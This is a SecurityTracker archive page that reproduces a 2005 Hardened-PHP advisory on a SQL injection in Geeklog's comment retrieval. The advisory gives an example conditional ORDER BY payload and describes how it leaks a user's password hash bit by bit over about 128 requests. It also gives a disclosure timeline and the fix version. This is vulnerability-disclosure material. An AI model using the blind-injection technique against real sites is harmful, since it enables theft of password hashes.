SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Forum/Board/Portal)  >   Geeklog Vendors:   Geeklog
Geeklog Input Validation Hole When Retrieving Article Comments Permits SQL Injection Attacks
SecurityTracker Alert ID:  1014381
SecurityTracker URL:  http://securitytracker.com/id/1014381
CVE Reference:   CVE-2005-2152   (Links to External Site)
Updated:  Jun 24 2008
Original Entry Date:  Jul 5 2005
Impact:   Disclosure of authentication information, Disclosure of system information, Disclosure of user information
Fix Available:  Yes  Vendor Confirmed:  Yes  
Version(s): prior to 1.3.11sr1
Description:   An input validation vulnerability was reported in Geeklog. A remote user can inject SQL commands.

If a target user has posted at least one comment to an article on the target system and the article has at least one additional comment, then a remote user can supply a specially crafted request to execute an SQL command on the underlying database. This can be exploited to retrieve the target user's hashed password.

The flaw resides in 'lib-common.php'.

The vendor was notified on June 30, 2005.

Stefan Esser of the Hardened-PHP Project reported this vulnerability.

The original advisory is available at:

http://www.hardened-php.net/advisory-062005.php

Impact:   A remote user can execute SQL commands on the underlying database.
Solution:   The vendor has issued a fixed version (1.3.11sr1), available at:

http://www.geeklog.net/filemgmt/viewcat.php?cid=8
http://www.geeklog.net/filemgmt/visit.php?lid=574

Vendor URL:  www.geeklog.net/ (Links to External Site)
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any)

Message History:   None.


 Source Message Contents

Subject:  [Full-disclosure] Advisory 06/2005: Geeklog SQL Injection


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1


                        Hardened-PHP Project
                        www.hardened-php.net

                      -= Security  Advisory =-



     Advisory: Geeklog SQL Injection Vulnerability
 Release Date: 2005/07/05
Last Modified: 2005/07/05
       Author: Stefan Esser [sesser@hardened-php.net]

  Application: Geeklog <= 1.3.11
     Severity: An input validation flaw within Geeklog allows
               SQL injection and can lead f.e. to user password
	       hash disclosure 
         Risk: High
Vendor Status: Vendor has released an updated version
   References: http://www.hardened-php.net/advisory-062005.php


Overview:

   Quote from http://www.geeklog.net
   "Geeklog is a weblog powered by PHP and MySQL. It allows you within
   minutes to set up a fully functioning dynamic website, and has many
   features to get you started. As of Geeklog 1.3, these features are:
   
       * User-system, allowing members of the public to register 
         for your site and submit stories.
       * Comment system, allowing users to comment on posts 
         made to your site.
       * Block system, allowing you to put information anywhere 
         on your site.
       * Plugin system that allows you to extend Geeklog, without 
         having to code any new PHP.
       * Theme system that allows users to select what layout they 
         want to view.
       * Excellent security model that allows you to give users 
         control over certain aspects of the site with no need 
	 to worry.
       * Site Statistics that show you the most popular areas 
         of your site.
       * Link system that allows users to add links to the site.
       * Calendar System that lets you and your user add 
         up-and-coming events.
       * Allow users to email stories to their friends."

   An audit of the Geeklog sourcebase has revealed a possible SQL 
   injection, that can f.e. lead to disclosure of a users password
   hash if this user has posted atleast one comment to an article
   and that article having atleast another comment.
   
   If the site admin account is also used for commenting to articles
   this means the admin password hash can be revealed with this hole.
   A possible candidate for this is for example some very popular
   site that documents everything about the SCO vs. World process.


Details:

   The Geeklog 1.3.x codebase is one of the PHP applications, that
   are quite secure, although it was designed to only run with
   register_globals turned on. They initialise their variables,
   filter user input and escape strings before putting them into
   SQL queries.
   
   Nevertheless our audit has revealed a possible SQL injection in 
   the ORDER BY clause of a query that is used to retrieve user 
   comments for a given article. Usually people believe that such an 
   injection is harmless, because MySQL does not allow multi queries 
   and so you can only influence the order of the returned rows.
   
   In this special case however the query performs a JOIN of the 
   comment and the user table, and therefore it is possible to 
   order the retrieved user comments in dependance of date in the
   user table. Such a conditional ORDER BY statement looks like:
   
     ORDER BY (u.uid=1 && (conv(substring(u.pass, 1, 1),16,10)&1))
   
   This example would order all comments of the user with userid 1
   to the end of all retrieved comments, but only if the lowest bit
   of the first nibble of the password hash is set.
   
   With similiar strings it is possible to retrieve the complete
   MD5 hash of the attacked user account, by sending 128 HTTP 
   requests and checking in the returned HTML page if the first 
   (switching search order) comment was written by the user. It
   should be obvious, that this issue is only exploitable if there
   are atleast 2 comments.
   
   The resulting MD5 hash can then be attacked in the usual way,
   to retrieve the users password.
   

Proof of Concept:

   The Hardened-PHP Project is not going to release an exploit 
   for this vulnerability to the public.


Disclosure Timeline:

   30. June 2005 - Contacted geeklog.net via email
   01. July 2005 - Sent requested POC to vendor 
   03. July 2005 - Vendor releases bugfixed version
                   (and request a disclosure not on 4th July)
   05. July 2005 - Public disclosure


Recommendation:

   We strongly recommend to upgrade to the vendor supplied
   new version 
      
      Geeklog 1.3.11sr1
      http://www.geeklog.net/filemgmt/visit.php?lid=574


Special Note to Secunia:

   You have censored 2 of our 3 Cacti advisories. In both we tried 
   hard to help you guys out with short summaries, because you often 
   have enormous problems with understanding advisories.
   
   Unfortunately we forgot to put such a summary into our 3rd Cacti
   advisory and so it is maybe our responsibility that you made up
   a 2nd bug in the administrative interface of Cacti that allows
   execution of arbitrary commands. In the special secunia summary
   we could have explained to you, that executing arbitrary commands
   as admin is one of the features of Cacti.


GPG-Key:

   http://www.hardened-php.net/hardened-php-signature-key.asc

   pub  1024D/0A864AA1 2004-04-17 Hardened-PHP Signature Key
   Key fingerprint = 066F A6D0 E57E 9936 9082  7E52 4439 14CC 0A86 4AA1


Copyright 2005 Stefan Esser. All rights reserved.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see http://www.gnupg.org

iD8DBQFCybGJRDkUzAqGSqERAoG7AKDqY38M67H+BI2QWqPUMj8EIbmw4gCgu/2g
3fgr9dlH/jnEKWoZRxXU7m8=
=OaI9
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC